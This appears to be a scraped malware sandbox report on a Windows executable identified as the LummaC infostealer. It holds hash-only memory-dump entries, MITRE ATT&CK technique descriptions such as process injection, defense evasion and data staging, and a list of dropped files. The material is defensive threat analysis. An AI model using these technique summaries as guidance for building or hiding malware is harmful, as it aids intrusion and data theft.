Source File: 00000004.00000002.4705057927.0000000005590000.00000040.00000800.00020000.00000000.sdmp, Offset: 05590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5590000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 067D4780 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4747235179.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67d0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df26564e57be8b7a7a6a54f1a63db8fe054e7790417c178b1f1e4d5923b4c87c
Instruction ID: 6dd413adbb8cddd9ffb616784f048129d0f3e6d12c66aa94fed3d5a6e3128fd1
Opcode Fuzzy Hash: df26564e57be8b7a7a6a54f1a63db8fe054e7790417c178b1f1e4d5923b4c87c
Instruction Fuzzy Hash: DEB09234500008EFCB49CF01E85499D7BB2BF44310F20C004FC124A264CB34A851CA80

Function 05E99610 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4723700380.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5e90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 451622a7dd85986427e8500eed8f021ca5af04235200efa2c39b46205698c5cc
Instruction ID: b24eeabb63805877f9ed92047f4774f955718c42aed5a9e179d751ca9242a985
Opcode Fuzzy Hash: 451622a7dd85986427e8500eed8f021ca5af04235200efa2c39b46205698c5cc
Instruction Fuzzy Hash: CB900232054B0C9B45803796740A566BB5DD6445197C04051F54D415129E66642045A5

Function 05E938C0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4723700380.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5e90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 05E93BB0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4723700380.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5e90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 06B1AFA0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4747739178.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6b10000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb1b81e0550ae344a43d2859933852ead2077c1ea83dc6852961a2588391a06f
Instruction ID: 8a91b4290357457aa98d6add40470b95bd79de764bfd06c2603c407e06c162ab
Opcode Fuzzy Hash: bb1b81e0550ae344a43d2859933852ead2077c1ea83dc6852961a2588391a06f
Instruction Fuzzy Hash: 4E90023504470CCB554127D5B909555B75DD5446157C09051A64D815029E65641445A5

Function 06B1DB60 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4747739178.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6b10000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cafacbe619f21873fa23203c7bb75283bcfdb3cac95ab79b442baa57f2bbee4b
Instruction ID: 66e9d82f6304ea3413f461aad9993b0f52b826996f468926a46ae155a92080a1
Opcode Fuzzy Hash: cafacbe619f21873fa23203c7bb75283bcfdb3cac95ab79b442baa57f2bbee4b
Instruction Fuzzy Hash: 4290223000820CCB808023803008080330C800803A3800000A20C800008F00200800A0

Function 067C9465 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4746191001.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9550d72b418598506f0f6f427830218e1cd2dcfdf7b3f98ba6b23779a9f628e8
Instruction ID: 1e6d574cfc89f3c8b098ffe0f8191bb7fde69d718de661aefa239b9c60fe3772
Opcode Fuzzy Hash: 9550d72b418598506f0f6f427830218e1cd2dcfdf7b3f98ba6b23779a9f628e8
Instruction Fuzzy Hash: 00B012B1008100FAE2840B404504B0675219710B12F00C009F30580040CB710600A621

Function 067CF050 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4746191001.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 0556A7E0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4703690018.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5560000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 0556A9C0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4703690018.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5560000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 05568A60 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4703690018.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5560000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 05026FB0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4691456690.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 00C908B0 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4610490503.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa37438986fc606d317b697ee7b80c43ce6b4be73107a2944e0b08849bb12bc3
Instruction ID: 92c3321f19bd9dee8744230a117577587ea6c291177ea3d32e396768c8f32e10
Opcode Fuzzy Hash: aa37438986fc606d317b697ee7b80c43ce6b4be73107a2944e0b08849bb12bc3
Instruction Fuzzy Hash: 6090023104460C8F89442B957809759B79C95446157818151B50D426565A66642086A5

Function 00C9F640 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4610490503.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 00C96790 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4610490503.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_c90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d49ae681ea76c63f78ef6de9dc9f3414c3b4dc0b142fe42934928bf1f6718b70
Instruction ID: 7f879b0752783a0e56ad86feeaf69423d911748daa5a8d29ea0d47d9a375dff9
Opcode Fuzzy Hash: d49ae681ea76c63f78ef6de9dc9f3414c3b4dc0b142fe42934928bf1f6718b70
Instruction Fuzzy Hash: 0A90223000020C8B020233803008000338CA00000038000A0E00C000080A0020008280

Function 0557B510 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4704199791.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5570000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Function 05E92C70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4723700380.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5e90000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Function 067CEDA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4746191001.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_67c0000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Function 05020540 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4691456690.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_HPd7I3vQri.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PT54FFSL7ET46RASB.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Bitcoin Miner

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_f4bd9c552ad4590b880a3e2579c837dc0c6c7_67dfe02b_084867d1-ed5d-409c-a7ed-e68c4ca9311f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1346.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1589.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15B9.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER15D6.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1626.tmp.txt

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Windows Analysis Report
PT54FFSL7ET46RASB.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

